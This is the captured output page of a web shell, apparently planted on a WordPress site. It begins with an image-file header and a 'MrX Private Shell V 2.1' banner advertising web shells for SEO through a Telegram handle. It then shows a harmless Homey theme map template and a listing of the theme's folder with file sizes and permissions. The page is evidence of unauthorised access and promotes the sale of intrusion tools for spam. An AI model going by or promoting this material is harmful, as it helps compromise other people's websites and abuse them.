����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
global $post, $homey_prefix, $homey_local;
$lat = homey_get_experience_data('geolocation_lat');
$long = homey_get_experience_data('geolocation_long');
$show_map = homey_get_experience_data('show_map');
$map_zoom_level = homey_option('singlemap_zoom_level');
$detail_map_pin_type = homey_option('detail_map_pin_type');
$experience_type = wp_get_post_terms($post->ID, 'experience_type', array("fields" => "ids"));
$icon = $retinaIcon = '';
if(!empty($experience_type)) {
$icon = get_term_meta( $experience_type[0], 'homey_exp_marker_icon', true);
$retinaIcon = get_term_meta( $experience_type[0], 'homey_exp_marker_retina_icon', true);
}
$marker_pin = wp_get_attachment_image_src($icon, 'full' );
$marker_pin_retina = wp_get_attachment_image_src($retinaIcon, 'full' );
if($show_map) {
?>
<div id="map-section" class="map-section">
<div class="block">
<h3 class="title">Map</h3>
<div id="homey-single-map"
data-zoom="<?php echo intval($map_zoom_level); ?>"
data-pin-type="<?php echo esc_attr($detail_map_pin_type); ?>"
<?php if(isset($marker_pin[0])){ ?>
data-marker-pin="<?php echo esc_url($marker_pin[0]); ?>"
<?php } ?>
<?php if(isset($marker_pin_retina[0])){ ?>
data-marker-pin-retina="<?php echo esc_url($marker_pin_retina[0]); ?>"
<?php } ?>
data-lat="<?php echo esc_attr($lat);?>"
data-long="<?php echo esc_attr($long);?>" class="map-section-map">
</div>
</div><!-- block -->
</div>
<?php } ?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| booking | Folder | 0755 |
|
|
| about-commercial.php | File | 2.84 KB | 0644 |
|
| about-host.php | File | 840 B | 0644 |
|
| about-v1.php | File | 7.9 KB | 0644 |
|
| about-v2.php | File | 6.72 KB | 0644 |
|
| about.php | File | 277 B | 0644 |
|
| availability.php | File | 2.37 KB | 0644 |
|
| contact-form.php | File | 5.05 KB | 0644 |
|
| contact-host.php | File | 4.08 KB | 0644 |
|
| custom-periods.php | File | 2.06 KB | 0644 |
|
| details.php | File | 7.78 KB | 0644 |
|
| experience-nav.php | File | 3.81 KB | 0644 |
|
| extra-prices.php | File | 1.76 KB | 0644 |
|
| features.php | File | 1.87 KB | 0644 |
|
| gallery.php | File | 3.39 KB | 0644 |
|
| host.php | File | 4.4 KB | 0644 |
|
| item-address.php | File | 2.2 KB | 0644 |
|
| map.php | File | 1.5 KB | 0644 |
|
| prices-hourly.php | File | 6.45 KB | 0644 |
|
| prices.php | File | 1.37 KB | 0644 |
|
| providing.php | File | 3.31 KB | 0644 |
|
| reviews.php | File | 5.57 KB | 0644 |
|
| rules.php | File | 5.31 KB | 0644 |
|
| services.php | File | 1.59 KB | 0644 |
|
| share.php | File | 1.67 KB | 0644 |
|
| similar-experience.php | File | 2.29 KB | 0644 |
|
| single-experience-v1.php | File | 6.19 KB | 0644 |
|
| single-experience-v2.php | File | 5.75 KB | 0644 |
|
| single-experience-v3.php | File | 6.21 KB | 0644 |
|
| single-experience-v4.php | File | 5.86 KB | 0644 |
|
| single-experience-v5.php | File | 6.6 KB | 0644 |
|
| single-experience-v6.php | File | 6.58 KB | 0644 |
|
| title.php | File | 3.41 KB | 0644 |
|
| top-gallery-full-width.php | File | 1.54 KB | 0644 |
|
| top-gallery-grid-section.php | File | 1.78 KB | 0644 |
|
| top-gallery-variable-width.php | File | 1.01 KB | 0644 |
|
| top-gallery.php | File | 1.44 KB | 0644 |
|
| video.php | File | 1.54 KB | 0644 |
|
| what-nearby.php | File | 10.32 KB | 0644 |
|